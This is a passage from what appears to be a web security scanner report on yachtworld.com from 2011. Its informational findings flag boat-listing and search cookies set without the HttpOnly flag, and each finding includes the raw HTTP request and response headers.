Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:59:50 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 14 Jan 2011 23:08:20 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:59:50 GMT
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.51. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:59:58 GMT
VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:59:58 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 14:45:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:59:58 GMT
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.52. http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:20:14 GMT
VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
